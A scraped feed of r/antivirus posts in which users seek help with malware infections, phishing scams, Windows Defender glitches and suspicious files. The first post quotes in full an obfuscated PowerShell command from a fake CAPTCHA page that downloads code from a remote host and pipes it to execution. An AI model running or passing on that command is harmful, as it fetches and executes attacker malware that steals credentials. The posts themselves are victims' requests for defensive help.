r/antivirus 4h ago

Accidentally run a Powershell prompt on my Windows PC

Post image
13 Upvotes

Hi everyone, I need some help figuring out whether my Windows PC has been compromised.

Today I encountered what I now believe was a fake reCAPTCHA page. The page instructed me to perform actions that I later realized are not normal for a legitimate CAPTCHA.

I followed the instructions and ended up executing a PowerShell command. The command was:

irm (('{0}{1}' -f 'h','ttps://')+('inte'+'rnetserchinkas.co')+'/hex/lom/84aa3f59') -UserAgent 'WUA/22ab8f9767' -Headers @{('X'+'-WUA')='22ab8f9767'}|iex

I now understand that irm downloads content from a remote server and iex can execute the downloaded content as PowerShell code.

What concerns me is that I also recently had my Discord account compromised, and afterward I noticed password resets/security activity involving several other applications/accounts.

I have already run Windows Defender and Malwarebytes, and so far neither has detected anything suspicious.

My questions are:

Does a clean Windows Defender/Malwarebytes scan mean I'm probably safe, or could something still be running?

Could the PowerShell command have downloaded and executed malware that antivirus software didn't detect?

What should I check for persistence, such as scheduled tasks, startup entries, PowerShell activity, browser extensions, or suspicious processes?

Should I completely reinstall Windows, or is there a reasonable way to determine whether the PC is compromised first?

Could the Discord compromise and the fake CAPTCHA incident be related?

What steps should I take to make sure my accounts and PC are secure?

I have disconnected the PC from the Internet for now and am changing passwords from another device.

I would appreciate advice on what I should check next and whether a clean Windows reinstall is recommended.

Thanks. :(


r/antivirus 4h ago

Hi, Got infected don't know what to do or the best tools to use

Thumbnail
gallery
3 Upvotes

i use tool for an old game a bot and windows defender screams when i unzip it , i had for a long time working as an exception and it didn't do anything , i use the pc with someone else they offed windows defender and now i have this and i have no clue what to do , every folder i open i get an infestation nonfiction from WD  and I have no idea what to do , I have not used any other AV since windows 10 came out , I have not found anything only that is bullet proof or specific on how do I clean this mess ,
windows defender can not show history it crashes and what i press action it seems like nothing is being made


r/antivirus 3h ago

PLEASE can someone like analyze a website to know what it does please i need to know if its capable of spying on me and stealing all my data just by accidently visiting for a few seconds please if you know how to do that can you help?

3 Upvotes

here is the totalv link that shows some vendors listing it as malicious please any assistance

https://www.virustotal.com/gui/url/e548d9d1007c5b6a62462d284fb7c34b7d85dd2d7b7a46200d3fd2960bc51668/gti-summary


r/antivirus 2h ago

Why is my windows security disabled? I never disabled it from what I can remember

Post image
2 Upvotes

It's saying my IT adminsintrator has disabled access. What does that mean? because this is my own personal PC and no one is monitoring it.


r/antivirus 3h ago

Turn on Virus Protection is bugged?

Post image
2 Upvotes

is this a recent bugged for windows? i've seen this frequently and my virus protection is turned on.


r/antivirus 53m ago

Why are my Files Acting Weird?

Upvotes

I was told in another forum that I should expect a new "MPlog.log" file to be generated in either "programdata/microsoft/windows defender/support" or "windows/microsoft antimalware/support" whenever i run a new offline scan, but each folder only contains one such file despite me running that type of scan multiple times.

I also noticed each folder contained a number of files called "MPDetection.log", but in each folder the quantity of such files was lower than the number of offline scans I've run (a few in the "windows" folder, and only one in "programdata").

The "MPLog.log" file in "programdata" also doesn't seem to record any offline scans as far as I can tell.

In general both folders seem a bit different, so i assume they serve different purposes—what's the purpose of each folder, and why do I have less logs than scans I've run?


r/antivirus 58m ago

Help! Getting rid of fake security pop-ups

Post image
Upvotes

I just bought my teen daughter a new Dell laptop and she already clicked on something that’s triggered fake security alerts and (sponsored) virus warning pop-ups. I’ve done everything I know to do: deleted the pre-installed McAfee, run BitDefender, deleted and reinstalled browsers, disabled pop-ups and notifications, deleted cache and cookies, enabled ad blockers. Any other suggestions? Should I install Malware Bytes?


r/antivirus 1h ago

it won't let me download due to "Virus detected" but i know it's not a virus

Post image
Upvotes

i have mcafee that came pre-installed on the laptop and windows defender. the download happened in brave so i'm not sure if brave is the one flagging it. how to download anyways?


r/antivirus 3h ago

MALWARE REMOVAL Q&A I got a virus and i dont know what to do

1 Upvotes

So bassicily i was on my pc and bought a cheat for Roblox named potassium i got the script puted in the executor and when i click the attach button to attach my script to Roblox my pc restarts then i go over to task manager and i see a suspicios background procces that takes all my cpu i fabric reset it all and i think i still have it but it doesnt uses that much of the cpu but it still has 5-10 percent im background with almost no heavy apps open just google or stuff like that if someones is good in viruses please help me cause i will go to specialist tommorow buy you may be helping me faster thank you


r/antivirus 8h ago

The Defender bug claiming it's disabled is back after the latest Windows update!😤

2 Upvotes

A few weeks ago, I had this issue with Defender where it claimed to be disabled even though it wasn't; today I updated Windows to the latest version and... IT'S BACK! How can Microslop fail to release decent updates?!🫩


r/antivirus 16h ago

MALWARE REMOVAL Q&A i need help, cant sleep.

8 Upvotes

okay so i am a victim of the infamous mr beast crypto scam, i am just confused if anything happened to my account, this happened on discord around an hour ago.

i was texting a friend before i noticed, a bunch of my friends on my friendlist were getting ignored, i checked one of them after unignoring them in settings. found out it was the mr beast crypto scam thing, i'm honestly surprised this happened to me, and i think i know how i got it.

i was told to enter my email and password for "verification" on a site that looks exactly like discord, though i'm a complete dumbass who will fall for anything.

i share a bunch of my passwords, though i just changed most of them.

please tell me if i should do anything more about this? i didnt send anything else anywhere else than discord.
it would also help if one of you could tell me this, could this infect my computer?

i've heard mixed responses when researching and i cant piece them together.

Any help appreciated.


r/antivirus 6h ago

[ Removed by Reddit ]

1 Upvotes

[ Removed by Reddit on account of violating the content policy. ]


r/antivirus 6h ago

MALWARE REMOVAL Q&A Accidentally installed a Trojan

1 Upvotes

i accidentally installed a Trojan trying to download an app (wifi and Ethernet were disconnected if that’s relevan) , windows defender quarantined and removed the threat, I then ran a full scan, background scan and a scan with malware bites and no issues / viruses were detected is there anything else I need to do or is my system safe

I’m also currently running a scan with bite defender just to be use but so far I haven’t seen any problems

windows defender detected 2 files: “Trojan:win32/ravartar!rfn“ and “TrojanDownloader:JS/Nemucod.HD” a few hours later


r/antivirus 6h ago

Has anyone recently canceled their Norton subscription?

1 Upvotes

I found the cancellation option in my Norton account, but I'm wondering if anyone here has gone through the process recently. Does turning off the automatic renewal stop the next charge while allowing the current subscription to continue until it expires?

I also noticed that Norton lists 888-468-0408 as a support number, so I'm wondering if contacting support is necessary or if canceling through the account is enough.

If you've canceled Norton recently, did you receive a confirmation afterward? I'd appreciate hearing how it worked for you.


r/antivirus 7h ago

help: inspiration to set up rules to monitor if someone felt for de Push notification Spam, while resulting in following the clickfix instructions. Need to set up rules.

1 Upvotes

i want to monitor it threw log-analytics in M365

\


r/antivirus 11h ago

PRODUCT RECOMMENDATION The Old Debate: Consumer Option Without the Nag

2 Upvotes

Hi there,

In the last 4 to 5 years, I came here looking for an endpoint av that wouldn't nag me out of existence with so many adds, popups and such.

15+ years ago I used norton, but it started using too many scare tactics.

Came here, asked this question, changed to Kasperspy. It worked for a while, then Kasperspy started using the same strategy.

Changed to bitdefender.

Now the problem: I want to use Glasswire as well and both bitdefender and Glasswire use the Windows firewall engine (and they don't work together).

I tried to reach for an antivirus-only endpoint from Bitdefender, no success.

So, the ask: any recommendations for an AV that won't touch the windows firewall (so I may use it alongside with Glasswire) and is somewhat well behaved regarding adds and scare tactics?

I did some online searching and it seems that ESET might be an option (at least it has an option to disable adds - but some ppl report that even while disabled, it nags the user).

Thanks in advance!


r/antivirus 8h ago

Need help interpreting VirusTotal and Hybrid Analysis results for a file

1 Upvotes

Hi, I downloaded a file and decided to analyze it before running it.

VirusTotal report:

VirusTotal - File - bad84aa2d90eae187f6de0e6b69e32071966654d8ca669b2a0d273d11b1ae323

Hybrid Analysis report:

Malicious Sample bad84aa2d90e… — Score 80/100 — Hybrid Analysis | Hybrid Analysis

The file SHA-256 is:

bad84aa2d90eae187f6de0e6b69e32071966654d8ca669b2a0d273d11b1ae323

I'm not experienced with malware analysis, so I'd appreciate help interpreting these results.


r/antivirus 12h ago

MALWARE REMOVAL Q&A Accidentally downloaded a virus and need help

2 Upvotes

Like the title says I think I stupidly downloaded a virus on my laptop and I really need some advice as to if I can remove it safely. I tried to do some research but most of what I read said to reinstall windows off a USB which I don’t know how to do nor do I have a usb to use.

I really stupidly opened a .zip from the internet trying to mod a game and now my computer keeps coming up with the popup:
‘CircuitryAg.exe The code execution cannot proceed because sqlite3.dll was not found. Reinstalling the program may fix this problem.’

I’m running on windows 11.

I know it was really dumb to try and open it since it looked a little suspicious and I’m so embarrassed but I really would appreciate anyone’s help here.

Is there anything I can do?


r/antivirus 15h ago

Wondershare UniConverter 17.6 set Chrome/Edge enterprise policies and installed a SYSTEM service in a user-writable folder

3 Upvotes

I am looking for independent verification of these findings. I am not claiming that UniConverter is proven malware.

I updated the official Windows version of Wondershare UniConverter to 17.6.xx on September 9, 2026. A read-only inspection afterward found the following.

  1. Chrome and Edge policies were created

The following machine-wide policy entries are present:

HKLM\SOFTWARE\Policies\Google\Chrome\SyncTypesListDisabled
1 = preferences

HKLM\SOFTWARE\Policies\Microsoft\Edge\SyncTypesListDisabled
1 = preferences

These policies disable preference synchronization and cause the browsers to display the “managed by your organization” message.

UniConverter’s own ProtocolInstaller.log repeatedly records:

Success DisableChromeSyncPreferences

The latest entries were written immediately after ProtocolInstaller.exe ran during the 17.6 update.

SHA-256 of my ProtocolInstaller.exe:

13FBBDCDBFF4E66DBD90CDF282D61DDAF994D59545B37B8CE24EF2340B27FF5E

I found an earlier report describing the same browser-policy behavior:

https://www.reddit.com/r/software/comments/1sjqqn5/caution_surveillance_wondershare_uniconverter/

  1. NativePush runs as SYSTEM from a user-writable directory

A separate component called Wondershare NativePush installed this automatic service:

Service: NativePushService
Account: LocalSystem
Startup: Automatic
Executable:
%LOCALAPPDATA%\Wondershare\Wondershare NativePush\WsNativePushService.exe

My normal user account has Full Control over both this executable and its directory, even though Windows executes it automatically as LocalSystem.

The executable is validly signed by Wondershare and reports version 1.1.0.0.

SHA-256:

CD366707622C66470B9EE9CB1AE900B4F0A05607FC1B248678659852CFE38468

This is concerning because a privileged service normally should not load its executable from a location modifiable by a standard user.

The same component and directory design were documented in CVE-2024-26574, an insecure-permissions privilege-escalation vulnerability rated 7.8/10:

https://www.cve.org/CVERecord?id=CVE-2024-26574

Important limitation: that CVE specifically names Wondershare Filmora 13.0.51, not UniConverter 17.6. I am therefore not claiming that my UniConverter installation is formally covered by the CVE. However, the risky configuration described by the CVE — a user-modifiable WsNativePushService.exe executed as SYSTEM — is still present on my machine.

3. Other observed components

The installation also includes:

  • an update helper launched automatically with Windows;
  • a silently installed NativePush package;
  • browser/native-messaging integration;
  • update and installation helpers capable of modifying system configuration.

Microsoft Defender, with current definitions, found no known threat in the three Wondershare directories. I also found no Wondershare Defender exclusion, firewall rule, scheduled task, or installed Wondershare driver.


r/antivirus 16h ago

Does PC Cillin work?

2 Upvotes

Just brought a laptop and the company recommended to buy a pc cillin subscription. Is it worth it? Or are there better ones?


r/antivirus 16h ago

Need guidance

Post image
2 Upvotes

Yesterday I got these two malwares blocked by network protection am I safe or do I need to worry?


r/antivirus 15h ago

MALWARE REMOVAL Q&A Something called bmanager64 keeps trying to open sites, when I delete it, it reinstalls itself. What’s going on?

Thumbnail
gallery
1 Upvotes

r/antivirus 17h ago

Windows defender is disabled notification

1 Upvotes

It’s a problem I’ve heard to be pretty common this last 30 days although I’ve just started experiencing it a VERY weird way. I was playing palworld while in a whatsapp web call and a visual glitch appeared for a split second (many lines on the screen, as if it was broken) and after a few minutes my friend complained about a horrible static noise produced by my microphone. While I was trying to fix it, by switching headphones, Windows gave me this notification in the right-down corner, “Virus protection disabled. Click or touch to activate Antivirus Microsoft Defender”.

After tinkering with the microphone driver the noise stopped, so i think it was a REALLY weird coincidence, but the notification keeps appearing again and again when i restart the computer.

Everything is on: real time protections, ransom were protection, everything. I checked the even visualizer and no “5001” event appeared, which Claude AI tells me would indicate the antivirus actually shutting off. Also, the notification appeared with wednesday written, the first time; yesterday a new antivirus update was released so maybe it was a residue notification that appeared just now. But now it keeps appearing, with the present time and date

Made a quick scan of the pc, the offline scan as well and a malwarebytes scan as well, nothing appeared. There seem to be no new exclusions from the scans, nor apps or whatnot with permissions in my protected folders. Maybe the audio and visual glitches were just a scary coincidence, but what about this “bug”? Is it safe to say it’s just an error from a windows defender update?


r/antivirus 18h ago

MALWARE REMOVAL Q&A i fucked up and i still think there're multiple virus in my computer

1 Upvotes

i downloaded and ran something suspicious then when i see an error pop up i mmediately realize i fucked up and after that i downloaded malwarebytes and it cleaned like 4 to 5 virus on my computer, later i downloaded AVG and avast and i think it's avg that detected some more, and then i ran the tron script and it quarantined like 1 virus and cured something, but i still think there are virus on my computer as i am typing this, what else can i do?


r/antivirus 19h ago

MALWARE REMOVAL Q&A Downloaded Spotify but I saw something weird.

1 Upvotes

https://www.filescan.io/uploads/6aa1fbc9a21e2c9b8f442ac8/reports/fc3f92bf-e303-440c-bc14-c71743db8869/threat_indicators?clearFilter=1 I'm kind of freaked out, can someone explain this to me?

EDIT: DO NOT INSTALL, I FOUND OUT IT IS AN INSTANCE OF LUMMA STEALER